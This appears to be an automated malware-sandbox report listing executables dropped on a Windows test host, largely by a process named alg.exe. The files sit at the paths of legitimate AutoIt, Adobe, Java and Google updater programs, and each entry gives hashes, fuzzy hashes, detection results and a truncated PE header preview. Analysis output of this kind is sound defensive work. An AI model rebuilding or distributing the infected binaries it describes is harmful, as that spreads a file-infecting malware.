                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0782EBFD9201F61000769CE33814B9E0C59DDD3C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:331AD338A8B6788259CC69E685A5FC68BA66CB0688C583D9DA2B3A29F0734932
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:97A7C511C42E96D553E71DCD3FA68BA23C563608C402566B8C54670A3576224A4E1545D246622140FF27B02493F0175787240985B309526997EA41DB85E2762E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................P ..............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.161601162838041
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:2+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSbLNiXicJFFRGNzj3:iSktbpN7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FF521E1A272AB9042E9D8F052AB09C43
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:2E884A914B1F7DAFB86CFC76AB61FAD2584454F2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EDA3CDE9AFF3F685D1EFA734C0E25991BB2FBE1302B72A5D553931960D9E2E5B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CE6938C887892CE78743ED840577CEC1FEF49EF4EE1D8AA710CFF1A0EDF6B5140BD901AD5A5BE1AD249496A214CACA06AE4B13A893018B8CCC6A975A82E96B89
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................F..... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.091305119183168
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:LGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLQLNiXicJFFRGNzj3:T4OEtwiICvYMRfw7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:19BDCA0C01E2EACEAE055CC12211C327
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6B07F82A2AF866547B1EC7A6615A59F1DFAC7E23
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C71BB8942F25C8091012DCF31D66510050853B76F30B3B7D3DCB44B071FD7B05
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8C6033A5D5FFFFD18BFBCCF7B303FEC01A9D405014B85659BBD905129E4CDA95FBCAD3E569AEBFEDDF655DF246D41B7C83A9BC134FAC36B3A20B3BB7EECDF411
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.....Z.-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1641472
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0793362768376324
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3AMJR+3kMbVjhD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Qi+lbVjhDLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C4F012533FA106D799D20C8F2AABDA9F
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:354BE7EDD9F624B86A20788B58945794EE73632E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5B9F19DDF513650EBB907C68E8D3B88A01BD9F156F1357561E2774294450AEC1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A2DA14B788781003AB6ED68F018E564D8B8282E7E879274952F378E9532F2331FBDE62690CC4D334D2F677A4D282D6F60C2AAD94AE6285B76EF14661FFAA9486
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.......................... $.............................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...............<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1445888
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.8152361915038595
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:5xGBcmlw/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:/Gy+wLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B304B3F52DE20CFC59D49162F1E99EEA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:13A958630D60D6AAFA55D275CA505314EBBAD721
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CE9D0E3368283827736086757B98186FF3AC6A038CAFD114E0E28AAE7BBA5558
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:06FCCB2C507F910FADB38F3C82643BA6816B141155853875A38A5CFF58518EF930620CF4D633F84CF40F0C844E3A7B3E8BDC3F646BC1B0986F311F4ABAE65A14
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@...........................!.....x.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...p...........`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1800192
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3060032548188945
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:S0vHymLj8trn3wsd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Dlj4rgsdLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:809F610C4303C8C7AC015509D8BF69A0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C1FCD8B55EFE5D02A1AE23BA579EC7A8D07D1283
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6515A6ED3933D4250C5B3A03D1BF7BDD1490FC4396287D2DD6E2908F1030AE2F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C384E5D34D46C86E61CD7E24D6B3A58F310891DAB859801E64AD061EB0E7F4279777CB8F97BCBB2A8A7564B0075B5ECFD88EFCFF9A183191B93655F28B068465
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................p&......B......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.273996120684623
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:34i0wGJra0uAUfkVy7/ZgLNiXicJFFRGNzj3:3N0wGJrakUQyu7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:806CCCA662D92B9D05B1EE92CD0794CE
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FDFF4A18EB4C59AA691DDB8FEA2A5690090CBBB4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1D6A3B7A30B3F936EEBB07EAA7FDFED9D9570F17BBEE7B11CB1C871AC9D2F574
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:42934928B43AFCC8945194795AAB4F4B56502C7165BDFCE89B197734BD1859A5C69303F93B66C33030F0D0EAEBF78BEB25C0271FF294704DC904D4E3FC121123
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................U...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.441616883154023
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:2eR0gB6axoCf0R6RLQRF/TzJqe58Bimr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ygHxmR6uBTzge5MimrLNiXicJFFRGNzb
                                                                                                                                                                                                                                                                                                                                                                                        MD5:505E966C43A7A788953E3C793066AC3C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EFC94BE52A648733D5D837AD5C833FEBF0A5C8B0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FD20723EEC8FDD6BE03E5C068A001CA1EF0935FF2EABBCC16A14843E97638EA7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:274E202E8C609364C9BEAFA9F1C746E51D1F785B433F5020AA625C0D835B35BD69316E20D9E1E5B4F992D3E45722DD19EC3C2F0E65E34476219F2ADF95B20E01
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`......Z1......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1530880
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.9995784447978435
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:icwOtO7t/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ihOtmtLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3D21CD154BCE6F852703085BC43643EF
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5FC9E8953F1A7AFABC1CD50EB50CA4EF3659B16D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0FBEFC37DFB9B429BCFED5EF04A8D1A8C3554991DE570FB6FBFF57EB9EB4D31F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5F00A0FDBAEDFFD7AB915D192C3F1E64ABA3D5808B0ABC758773C6195FFD1E5EB026040BA12D9BE93930097A281D878F64943982F483B3C4570D1AE15AF009F7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P".....-j.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1530880
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0002727867867085
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3fU/h/4KK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3M/VKLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3BBBA442CEDD8B33B09C807F9940C50F
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DB1075C4143B0F7B5CC5E6BF3C5227733F26A137
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3D87B24AFE90F89A7FF9BDB2E83D9A4FB2BA0087E238E12CCDF291972474BA24
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6C25621A9DB84179BD967E7952276CF567DD8BFC8CDE922C0290E427D28C7AA7CF7B4823230CA8BD4D64E20203063B5049062EC037BB4344BA769A408CE619E8
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P"......k.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1669632
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.073462703744842
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ox7NiBLZ05jNTmJWExR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oxZiHIjNgRLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:62ED00C9EDE231DFD22BB19C8740FF42
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C9492483D3AAA163C891444C48F73AA12448E3CA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8385AEEAA4A8910AF8DFCD85F0366630E30812BCD194630C7974932FDFE0BCF4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5A8FA1E6D3D10772702DDE9A2CA8E842A843553874F4DDB05D3AB42479F240FE35F4C491E86CADFA33114B268788D5B8F4ABF362B5ECB5B326F33B1198F13FD2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%......W..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1574912
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.031898067589208
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:YlnRkl46fgJcEwixD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:soJfgJcEwCDLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E4FABC5D1E4055A5A21B0FDABAFC10DB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6565DC94672F8D7990995ECB95E94CDBB3D5ADE6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F815BC521B58B295E91E2D629BEBC621F0BCE23EB4F40193B6B3F8E0BEB6523
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F50579F1C0F45D317417ECBED133F9B3346CDE72DFCB95497EB81270C0F69FE005871F50E880DA40E46C20E5D69808E6D8634FE84F8B76331B05C43841356063
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................#.....".......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1677824
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.088236177055988
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:HW+5k8hb0Haw+xz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:HWKk8SHawmzLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B0F3E2E3752CB849445C9404B2EE9287
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EBF81A327740F344BD47C4211ADEEC70CC69D944
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AA99AE67FCA01B35A52813D96748990129904A3B581B580E56B3837AD314D2BA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F90CC27E8EAB08113E9B85F72D3CDA97E81E417B0F450A59D63B601CF50FAC5219342D65F809A20AB2ADE0D1D2D7B02A2DACCA367F5B0D8741C1B4DD6825BD8E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@..............................$........... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...p...`......................@...........................................................................................................................

